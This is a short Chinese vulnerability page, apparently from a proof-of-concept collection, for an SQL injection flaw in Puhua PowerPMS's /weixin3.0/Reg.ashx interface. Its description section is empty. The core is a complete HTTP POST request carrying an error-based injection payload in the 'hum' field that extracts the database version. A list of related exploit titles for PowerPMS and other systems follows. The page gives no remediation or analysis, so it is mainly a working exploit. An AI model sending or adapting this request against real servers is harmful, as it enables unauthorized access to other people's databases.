普华科技-PowerPMS Reg.ashx接口存在SQL注入漏洞

漏洞描述

PoC代码

POST /weixin3.0/Reg.ashx HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36

hum=1'and 1<@@VERSION--

相关漏洞推荐

• POC CVE-2021-4073: RegistrationMagic <= 5.0.1.7 - Authentication Bypass
• 新视窗新一代物业管理系统 /OfficeManagement/RegisterManager/Report/Training/Report/GetprintData.asmx SQL 注入漏洞
• XWiki Platform /bin/register/XWiki/XWikiRegister 代码执行漏洞（CVE-2024-21650）
• 金和OA GroupOuterRegisterAdd.aspx SQL注入漏洞
• POC 普华科技 PowerPMS /PowerPlat/FormXml/DocFile/OfficeService.aspx 文件读取漏洞
• POC 普华PowerPMS /weixin3.0/Reg.ashx SQL 注入漏洞
• PowerPMS File.ashx存在SQL注入漏洞
• POC 普华 PowerPMS Transfer.aspx 未授权访问漏洞
• 普华 PowerPMS File.ashx SQL注入漏洞
• 普华 PowerPMS download SSRF漏洞
• POC 普华 PowerPMS Reg.ashx SQL注入漏洞
• 普华 PowerPMS OfficeService.aspx SQL注入漏洞
• docker-registry: Docker Registry Listing